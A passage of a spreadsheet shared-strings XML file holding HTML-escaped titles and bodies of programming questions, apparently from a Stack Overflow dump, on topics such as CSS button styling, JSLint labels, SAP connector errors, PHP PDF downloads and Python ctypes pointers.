    <t>Reverting CSS style of &lt;input type=submit button to its default style</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a bookmarklet that inserts a script tag into the current web page.&lt;/p&gt;
&lt;p&gt;This script has some UI and an "&lt;code&gt;input type=submit....&lt;/code&gt;" tag in it.&lt;/p&gt;
&lt;p&gt;Web page A has chosen not to style "&lt;code&gt;input type=submit..&lt;/code&gt;" tags whereas web page B has styled them.&lt;/p&gt;
&lt;p&gt;This results in the bookmarklet displaying differently styled submit
buttons based on the underlying page's style.&lt;/p&gt;
&lt;p&gt;I want the submit buttons to be styled identically on all web pages in &lt;strong&gt;its default manner&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;One solution is to set the CSS style for the submit button within my script 
so it shows up identically on all pages. (This is what I have done for all 
other tags).&lt;/p&gt;
&lt;p&gt;My question is: &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;How do I set the CSS style for the submit button so it displays in a 
'default manner' or ?  &lt;/li&gt;
&lt;li&gt;Can one remove existing styling, and, if so, how for the button so that it displays in the 'default manner'?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In other words, how can I have the submit buttons within the UI of my 
bookmarklet be displayed in the 'default manner' regardless of whether 
the underlying web page has chosen to style it or not?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Note: By 'default manner' I mean the way the submit button is displayed when no styling is added to it. For example the 'Google search' or 
  'I'm feeling lucky' buttons on &lt;a href="http://www.google.com" rel="nofollow"&gt;http://www.google.com&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How can I read an XML file into a buffer in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to read an XML file into a &lt;code&gt;char *buffer&lt;/code&gt; using C.&lt;/p&gt;
&lt;p&gt;What is the best way to do this?&lt;/p&gt;
&lt;p&gt;How should I get started?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VSTO: Can't create workbooks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I try to create a Excel or Word workbook project in VS, I get the message: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A compatible version of Microsoft
  Office is not installed on this
  computer.  You must install the
  version of Office that is compatible
  with your project.  In addition,
  repair the version of the Visual
  Studio Tools for Office runtime  that
  is appropriate for your project by
  running the installation program and 
  selecting the Repair option. The
  runtime is available at the Microsoft 
  Download Center.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have VS 2008 and Office 2003 Professional SP 3 installed. I did a full install of Office, 
and it looks like the Interop DLLs are in the GAC. I am creating an Office 2003 project. I tried the steps from &lt;a href="http://stackoverflow.com/questions/274653/vsto-problem-cannot-create-visual-studio-excel-workbook-project"&gt;http://stackoverflow.com/questions/274653/vsto-problem-cannot-create-visual-studio-excel-workbook-project&lt;/a&gt;. I repaired VS 2008 from the disk after installing Office 2003 Pro. I had Office 2003 Standard installed earlier, but I removed it before installing Office 2003 Pro. I am able to create add-ins. Any ideas? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which JDBC jar should I use with java 1.5.0_16 and PostgreSQL 8.3.5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which JDBC jar should I use with java 1.5.0_16 and PostgreSQL 8.3.5?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby (Shoes) - Wait for function to return value</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a function that presents the user a combo-box.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def select_interface(interfaces)
  list_box :items =&amp;gt; interfaces do |list|
    interface = list.text
  end
  ### ideally should wait until interface has a value then: ###
  return interface
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The rest of the program depends on the selection from this combo-box.&lt;/p&gt;
&lt;p&gt;I would like to find a way to make ruby wait for the input from the combo-box and then carry executing the rest of the code.&lt;/p&gt;
&lt;p&gt;There is a similar function in &lt;a href="http://shoooes.net" rel="nofollow"&gt;shoes&lt;/a&gt; called &lt;strong&gt;&lt;a href="http://help.shoooes.net/Built-in.html#ask" rel="nofollow"&gt;ask&lt;/a&gt;&lt;/strong&gt; that will wait for the input of the user.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;interface =  ask("write your interface here")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I implement this "wait until the variable has a value" function in Ruby/shoes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Do You Set a Textblock to Autosize to the Width of a TreeView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;TextBlock&lt;/code&gt; that I need to autosize to the width of a &lt;code&gt;TreeView&lt;/code&gt;.  The &lt;code&gt;TreeView&lt;/code&gt; and the &lt;code&gt;TextBlock&lt;/code&gt; are both contained in a &lt;code&gt;StackPanel&lt;/code&gt;.  The &lt;code&gt;StackPanel&lt;/code&gt; is inside an &lt;code&gt;Expander&lt;/code&gt;.  The width of the &lt;code&gt;TreeView&lt;/code&gt; should drive the width of the other objects and I need the height of the &lt;code&gt;TextBlock&lt;/code&gt; to change to display the full text.  All my efforts have resulted in the &lt;code&gt;TextBlock&lt;/code&gt; driving the width.  Thanks!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;       &amp;lt;Expander IsEnabled="True" HorizontalAlignment="Right" Margin="0,8,8,53" x:Name="ExpanderBookMarks" Width="Auto" Foreground="#FF625B5B" ExpandDirection="Down" IsExpanded="True" Header="Bookmarks" Visibility="Hidden"&amp;gt;
        &amp;lt;StackPanel Name ="StackPanelBookmark" Orientation="Vertical" Width="{wpf:Binding Path=Width, ElementName=trvBookmarks, Mode=Default}"&amp;gt;
            &amp;lt;TreeView x:Name="trvBookmarks" ItemsSource="{Binding}" 
              ItemTemplateSelector="{StaticResource BookmarkTemplateSelector}" 
              Margin="0,0,0,0" 
              TreeViewItem.Selected="HandleTreeViewItemClick" AllowDrop="True"/&amp;gt;
            &amp;lt;TextBlock x:Name="TextBlockBookmarkDiscription" TextWrapping="Wrap" Foreground="AntiqueWhite" Background="Transparent" Width="150"&amp;gt;
                This is the discription area and needs to be very long because the end user can put 400 charectors in.                    
            &amp;lt;/TextBlock&amp;gt;
        &amp;lt;/StackPanel&amp;gt;
        &amp;lt;!--End of Dougs Treeview--&amp;gt;
    &amp;lt;/Expander&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Getting a JSLint warning concerning labels in Javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my javascript I have this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    loopDeLoop:
        while (foo !== bar) {
            switch (fubar) {
                case reallyFubar:
                    if (anotherFoo == anotherBar) {
                        break loopDeLoop;
                    }
                    break;
                default:
                    break;
            }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But JSLint says... lint warning: use of label&lt;/p&gt;
&lt;p&gt;Here's the notes from &lt;a href="http://www.jslint.com/lint.html" rel="nofollow"&gt;JSLint&lt;/a&gt;  &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Labels&lt;br /&gt;
  JavaScript allows any statement to have a label, and labels have a separate name space. JSLint is more strict.&lt;/p&gt;
  &lt;p&gt;JSLint expects labels only on statements that interact with break: switch, while, do, and for. JSLint expects that labels will be distinct from vars and parameters.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How do I construct the above to get rid of the warning?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;br /&gt;
Greg&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C/objC/C++/Java compilers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I downloaded NetBeans (for first time) to use Java and found that it can handle C/C++ etc too.  &lt;/p&gt;
&lt;p&gt;Wanted to know following --&lt;/p&gt;
&lt;p&gt;01- Is there any better C++ tool (IDE) other than NetBeans and MS Visual Studio? Better means very mature and popular (and free).&lt;/p&gt;
&lt;p&gt;02- What is the difference between GNU Java and Sun Java compilers?&lt;/p&gt;
&lt;p&gt;02- Is there any other popular C/ObjC/C++ complier out which is free, mature and popular?&lt;/p&gt;
&lt;p&gt;Thank you for the reply.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SAP .NET Connector: System exception thrown while marshaling .NET type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My app sends lots and lots of data to SAP. To di this, it builds up an SAP table object and sends it over. I get this error somewhat regularly, but not reliably:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System exception thrown while marshaling .NET type 20081219 to RFCTYPE_BCD
   at SAP.Connector.Rfc.RfcMarshal.NetFieldToRfcField(Object src, RFCTYPE type, Encoding encoding, Byte[] dest, Int32 offset, Int32 len, Int32 charSize, Int32 decimals)
   at SAP.Connector.Rfc.RfcStructureUtil.ToRfcStructure(Object obj, Byte[] dest, Type t, Encoding encoding, Boolean isUnicode, PropertyInfo[] propinfos, RfcStructInfo structInfo)
   at SAP.Connector.Rfc.RfcStructureUtil.GetITabFromList(SAPConnection conn, Object list, Type t, RfcStructInfo structInfo, Int32 itab)
   at SAP.Connector.Rfc.RfcClient.PrepareClientParameters(Type classType, MethodInfo m, Boolean isTQRfc, Object[] MethodParamsIn, RFC_PARAMETER[]&amp;amp; paramsIn, RFC_PARAMETER[]&amp;amp; paramsOut, RFC_TABLE[]&amp;amp; tables, ParameterMap[]&amp;amp; paramMaps)
   at SAP.Connector.Rfc.RfcClient.RfcInvoke(SAPClient proxy, String method, Object[] methodParamsIn)
   at SAP.Connector.SAPClient.SAPInvoke(String method, Object[] methodParamsIn)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's weird is that this doesn't happen every time. Also, the .NET type it complains about, "20081219" is the &lt;em&gt;data&lt;/em&gt; I'm passing (a date)--not a type. I think the type of that field is &lt;code&gt;RFCTYPE.RFCTYPE_TIME&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Any suggestions on how to troubleshoot this intermittent error? Is there some kind of state I should be clearing between calls to the SAP RFCs?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As requested, here's the code that calls SAP:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Using sapConnection As New MySapProxy(ConnectionString)
  sapConnection.Connection.Open()
  sapConnection.TheSapRfcICall(SapOpCode, Nothing, Nothing, sapTable, ResultTable)
End Using
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm thinking maybe multiple threads are using the same connection some how. Using &lt;code&gt;SAP.Connector.GetNewConnection&lt;/code&gt; instead didn't change anything. &lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It seems this problem occurs even when I run a single thread! What's the deal??&lt;/p&gt;
&lt;p&gt;Is there a way to disable the connection pool to see if that fixes it?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;@Igal Serban's &lt;a href="#382242" rel="nofollow"&gt;answer&lt;/a&gt; seems to be working for me. I'll check the logs tomorrow morning and (hopefully) award the bounty! Thanks so much.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As requested, my version of librfc32.dll is 6403.3.78.4732.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Securly download file inside browser with correct filename</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am doing some work on a web site that has a secure area which is available to users only after they have logged in. In this area there is a page with links to pdf documents which can be downloaded. The physical documents are outside of the web site's root directory. The links to the pdf documents look something like this:&lt;/p&gt;
&lt;p&gt;index.php?page=secure-area/download&amp;amp;file=protected.pdf&lt;/p&gt;
&lt;p&gt;Which executes the following (note: I know this is the way to force a download rather than open the file &lt;em&gt;inside&lt;/em&gt; the browser):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// check security, get filename from request, prefix document download directory and check for file existance then...
header('Content-Type: application/pdf');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
header('Connection: Close');
set_time_limit(0);
readfile($file);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works well but in Firefox 3 and Internet Explorer 7 (I haven't tested with any other browser) won't open this file inside the browser, they both show the download dialog box (as expected). If I select Open rather than Save, the document is downloaded and Adobe Reader is started outside of the browser to render the document.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The problem I have is downloading the file inside the browser and having the correct default file name if saved.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I would like the document to open in the browser. One way of doing this is using the header "Content-Disposition: inline;" but this means that I can't specify a filename (because is seems to be ignored by the browser). The problem with doing that is when I save the document, the default name is that of the URL, not the filename of the pdf document:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http___example.com_index.php_page=secure_area_download&amp;amp;file=protected.pdf
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I get Firefox and Internet Explorer to open the document inside the browser and provide the correct default filename to save?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I redirect output to stderr in groovy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to redirect output in a groovy script to stderr:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;catch(Exception e) {
    println "Want this to go to stderr"
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Help with ActiveRecord exception "Failed to lazily initialize a collection - no session"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a web app using Castle ActiveRecord, and I keep getting this exception whenever I try to access a lazy loaded list of related objects.  Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        using(new SessionScope())
        {
            foreach (var field in eventObj.RegistrationFields)
            {
                //Do something with the field here...
            }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The RegistrationFields property looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    [HasMany(Inverse = true, Lazy = true)]
    public IList&amp;lt;EventRegistrationField&amp;gt; RegistrationFields { get; set; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The exception happens when the "eventObj.RegistrationFields" is accessed for the foreach loop.  I also made sure to set the isweb="true" attribute in my activeRecord config settings.  Does anyone know why this would happen?  Here is my config:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;connectionStrings&amp;gt;
  &amp;lt;add name="main" connectionString="Data Source=localhost\SQLEXPRESS;Initial Catalog=EventScheduler;Integrated Security=SSPI"/&amp;gt;
&amp;lt;/connectionStrings&amp;gt;
&amp;lt;activerecord isWeb="true"&amp;gt;
  &amp;lt;config&amp;gt;
    &amp;lt;add key="hibernate.connection.driver_class" value="NHibernate.Driver.SqlClientDriver"/&amp;gt;
    &amp;lt;add key="hibernate.dialect" value="NHibernate.Dialect.MsSql2005Dialect"/&amp;gt;
    &amp;lt;add key="hibernate.connection.provider" value="NHibernate.Connection.DriverConnectionProvider"/&amp;gt;
    &amp;lt;add key="hibernate.connection.connection_string_name" value="main"/&amp;gt;
  &amp;lt;/config&amp;gt;
&amp;lt;/activerecord&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Should we always favor polymorphism over enums?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After watching: &lt;a href="http://www.youtube.com/watch?v=4F72VULWFvc"&gt;The Clean Code Talks -- Inheritance, Polymorphism, &amp;amp; Testing&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I checked my code and noticed a few switch statements can be refactored into polymorphism, but I also noticed I only used switch statements with enums.  Does this mean enums are "evil" in OO-design and should be eliminated with polymorphism?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good design pattern to implement a dynamic data importer tool?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are planning to build a dynamic data import tool. Basically taking information on one end in a specified format (access, excel, csv) and upload it into an web service.  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The situation is that we do not know the export field names, so the application will need to be able to see the wsdl definition and map to the valid entries in the other end.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the import section we can define most of the fields, but usually they have a few that are custom.  Which I see no problem with that.  &lt;/p&gt;
&lt;p&gt;I just wonder if there is a design pattern that will fit this type of application or help with the development of it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Browser Add-On/Extension and Browser Form data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone point me to an article (or discuss here) that explains how an add-on/extension can read what a user has completed in a form in a browser so you can present data to them based on the search parameters?&lt;/p&gt;
&lt;p&gt;An example would be the Sidestep extension that opens a sidebar when a user searches on an airline/travel site and presents them a Sidestep meta search based on the parameters used on the original airline/travel site.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Pass some parameter to MVC User Control that is not in ViewData</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to pass some parameters to my MVC UserControl like ShowTitle(bool) and the ViewData.Model.Row . How I define my usercontrol and pass them to it?
Tanx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting back on track after disruptions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Over the past few weeks it seems like I've been interrupted by maintenance tasks from old projects quite a bit in addition to a taking a training class.  I feel like I've lost all forward momentum on my current project.  It's difficult to even start coding because I'm not sure what I was doing and what I  was thinking before the interruption.&lt;/p&gt;
&lt;p&gt;What tips or techniques do you have to help make it easier to get restarted after an interruption that takes you away from your current project for a couple of hours or days?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ experts: is the offset of a member variable to its class constant under these conditions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a variable &lt;code&gt;foo&lt;/code&gt; of type &lt;code&gt;FooClass*&lt;/code&gt; and a member variable in that class named &lt;code&gt;bar&lt;/code&gt;, is the distance between &lt;code&gt;foo&lt;/code&gt; and &lt;code&gt;&amp;amp;(foo-&amp;gt;bar)&lt;/code&gt; the same in any situation with some constraints:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;code&gt;FooClass&lt;/code&gt; is a non-POD type.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We know that &lt;code&gt;foo&lt;/code&gt; will always point to an instance of &lt;code&gt;FooClass&lt;/code&gt;, and not some subtype of it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We only care about behaviour under a single compiler and a single compilation; that is, the value this may result in under gcc is never used in code compiled with MSVC, and it is never saved to be re-used between compilations. It is computed in the binary and used in the binary, and that is it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;We don't use a custom &lt;code&gt;new&lt;/code&gt;, although some instances of the class may be stack-allocated and some heap-allocated.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There is no explicit &lt;code&gt;ctor&lt;/code&gt; for &lt;code&gt;FooClass&lt;/code&gt;; it relies upon the compiler-generated one (and each of the fields in &lt;code&gt;FooClass&lt;/code&gt; is either POD or default-constructable).&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I can't find a guarantee either way on this in the standard (nor did I expect to), but my rudimentary testing with gcc leads me to believe that it will always be the case there. I also know that this guarantee is made for POD-types, but let us assume this type can't be POD.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;An update/clarification:&lt;/strong&gt; this is just for a single compilation of a single binary; the calculated offsets will never leave that single execution. Basically, I want to be able to uniquely identify the fields of a class in a static map and then be able to lookup into that map for some macro/template/EVIL trickery. It is merely for my own amusement, and no life support machines will rely on this code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Latex using eps images builds slowly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Working with a latex document with eps images as in the example below...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\documentclass[11pt]{paper}
\usepackage[dvips]{graphicx}
\usepackage{fullpage}
\usepackage{hyperref} 
\usepackage{amsmath} 
\DeclareMathSizes{8}{8}{8}{8}
\author{Matt Miller}
\title{my paper}
\begin{document}
\begin{figure}[!ht]
    \begin{center}
    \includegraphics[width=2in] {Figuer.eps}
    \end{center}
    \caption{Figure\label{fig:myFig}}
\end{figure}
\end{document}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I got to build my latex document the time it takes to build the document increases with time.  Are there any tips or tricks to help speed up this process?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;latex paper.tex; dvipdf paper.dvi
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How does the syndication part of RSS work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand how to make an RSS file. The XML for it is simple enough. But do I have to anything special for updates to get distributed or do I just need to update the file periodically and the rest will take care of itself? All of the stuff I've found on rss talk about what it does but not so much how.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to import word documents into wiki?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone knows? Because i think one of the stumbling blocks for people to embrace wiki is of the fact that they need to separately upload the images to the wiki instead of just doing simple copy/paste to the word document&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the easiest approach to synchronize and duplicate oracle db schema?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I find it hard to generate the dbscripts from TOAD. I get errors when executing the scripts things like looping chain of synonyms or certain statement not abel to exceute etc.&lt;/p&gt;
&lt;p&gt;Is there any seamless way in said like connecting a remote oracle schema and just duplicate to my local environment?&lt;/p&gt;
&lt;p&gt;And also do synchronization along the way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ADO.NET Entity : limiting data selection based on View</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Consider following example:&lt;/p&gt;
&lt;p&gt;SQL Table Customer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ID: Primary Key
Name: Name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SQL View ViewCustomerSelection:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ID: Link to Customer ID
SomeOption: Not important
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to create ADO.NET an entity that only selects customers that have corresponding values in ViewCustomerSelection&lt;/p&gt;
&lt;p&gt;Following does NOT work:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create entity that maps to Customer and to ViewCustomerSelection without using any conditions and any fields from ViewCustomerSelection : ViewCustomerSelection is not included in SQL and all customers are returned.&lt;/li&gt;
&lt;li&gt;Include a field from ViewCustomerSelection : Correct selection is returned but now Customer object is not updateable &lt;/li&gt;
&lt;li&gt;Specify "not null" condition on SomeOption field : error - "Property ViewCustomerSelection.SomeOption with 'IsNull=false' condition must be mapped.&lt;/li&gt;
&lt;li&gt;Specify "not null" condition on ViewCustomerSelection.ID field : error - "Entity type contains a condition on its primary key. Please remove the condition from the mapping.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Clarification &lt;/p&gt;
&lt;p&gt;Database definition:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;create table Customer {
ID [int] IDENTITY(1,1) NOT NULL,
Name [varchar](50) NOT NULL
} CONSTRAINT [PK_Customer] PRIMARY KEY CLUSTERED 
(
    [ID] ASC
)
create table ViewCustomerSelection
as select customer.id, ToUpper(customer.name) as SomeOption where customer.name like 'A%'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to have entity Customer with ID and name, that only has records for records present in ViewCustomerSelection (note - in actuality the view is more complicated and can not be expressed using simple conditions)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I convince skeptical colleagues about proper namespaces in .Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My team is working on a conversion project to convert one product (but with many facets) from VB6 to .Net (we have over ~300k LOC). Before I got on board, the decision was made that regardless of the location of the assembly, or folder structure, all classes / structs will be in one namespace:&lt;/p&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;p&gt;They even go as far as changing auto-generated application settings designer code, resource designer code, and such to force uniformity. How do I convince them that namespace use is good? What is the proper use of namespace and what are the pros and cons? I guess I am having a tough time understanding why my colleagues would go through so much hassle to save a few using lines. Any external, reputable references to support your argument would be much appreciated. Please help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Keyup Event After a Time Interval</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this jQuery code that queries an API on a keyup event (via keyterms.php).  It works as it is, but I'm trying to figure out how to implement a "pause" so to speak such that it will only do a query after a certain amount of time (say 2sec.) after the last keyup.  Any help will be much appreciated.  Thanks!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(document).ready(function() {
    $('#loading').hide();
    $('#q').keyup(function(){
      $('#loading').show();
      $.post("keyterms.php", {
        q: $('#q').val()
      }, function(response){
        $('#qResult').fadeOut();
        setTimeout("finishAjax('qResult', '"+escape(response)+"')", 400);
      });
        return false;
    });
});
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>In Mac OS X, is there a programmatic way to get the machine to go to sleep/hibernate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there some command line or AppleScript that I can write/run to make the machine go to sleep automatically or even better, into hibernate mode? &lt;/p&gt;
&lt;p&gt;I can run the program as root.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Python's ctypes to pass/read a parameter declared as "struct_name *** param_name"?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use Python's ctypes library to access some methods in the scanning library &lt;a href="http://www.sane-project.org/" rel="nofollow"&gt;SANE&lt;/a&gt;.  This is my first experience with ctypes and the first time I have had to deal with C datatypes in over a year so there is a fair learning curve here, but I think even without that this particular declaration would be troublesome:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;extern SANE_Status sane_get_devices (const SANE_Device *** device_list, SANE_Bool local_only);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;First of all, I've successfully dealt with &lt;code&gt;SANE_Status&lt;/code&gt; (an enum) and &lt;code&gt;SANE_Bool&lt;/code&gt; (a typedef to &lt;code&gt;c_int&lt;/code&gt;).  Those were both simple.  That first parameter, on the other hand, is causing me all sorts of grief.  I'm unfamiliar with the "&lt;code&gt;***&lt;/code&gt;" notation to begin with and my tracer bullets so far have yielded nothing more than garbage data.  How do I format the input to this function such that I can read back a list of my Python structure-objects?  For reference, the C structure being referenced is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef struct
{
    SANE_String_Const name; /* unique device name */
    SANE_String_Const vendor;   /* device vendor string */
    SANE_String_Const model;    /* device model name */
    SANE_String_Const type; /* device type (e.g., "flatbed scanner") */
 }
SANE_Device;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where &lt;code&gt;SANE_String_Const&lt;/code&gt; is defined as a &lt;code&gt;c_char_p&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;My Python/ctypes version of this object is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class SANE_Device(Structure):
    _fields_ = [
        ("name", c_char_p),
        ("vendor", c_char_p),
        ("model", c_char_p),
        ("type", c_char_p)]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Suggestions on what I should pass in such that I can get the expected behavior (a list of structure-objects) out of this?  All responses appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update 1:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Using the following, I was able to retrieve a correct SANE_Device Python structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;devices = pointer(pointer(pointer(SANE_Device())))
status = libsane.sane_get_devices(devices, c_int(0))
print status, devices, devices.contents.contents.contents.name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, 1) yuck and 2) that seems like it would only work if there is a single result.  I can't len() on &lt;code&gt;devices.contents.contents&lt;/code&gt; or &lt;code&gt;devices.contents.contents.contents&lt;/code&gt;.  How am I to determine the number of results?  The SANE docs specify that "If the function executes successfully, it stores a pointer to a NULL terminated array of pointers to SANE_Device structures in *device_list".  Suggestions?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update 2:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I was able to pass an ten-item array and then access the first element using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;devices = pointer(pointer(pointer((SANE_Device * 10)())))
status = libsane.sane_get_devices(devices, c_int(0))
print status, devices, devices.contents.contents.contents[0].name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, ten is obviously an arbitrary number and I have no way of determining the actual number of results.  Trying to access &lt;code&gt;devices.contents.contents.contents[1].name&lt;/code&gt; when only one device is connected causes a segmentation fault.  There must be a proper way of dealing with variable-length constructs like these in ctypes.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Processing CSV files from the Web using embedded Java database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Short version: assuming I don't want to keep the data for long, how do I create a database programmaticly in HSQLDB and load some CSV data into it to? My schema will match the files exactly and the files do have adequate column names.&lt;/p&gt;
&lt;p&gt;This is an unattended process.&lt;/p&gt;
&lt;p&gt;Details:&lt;/p&gt;
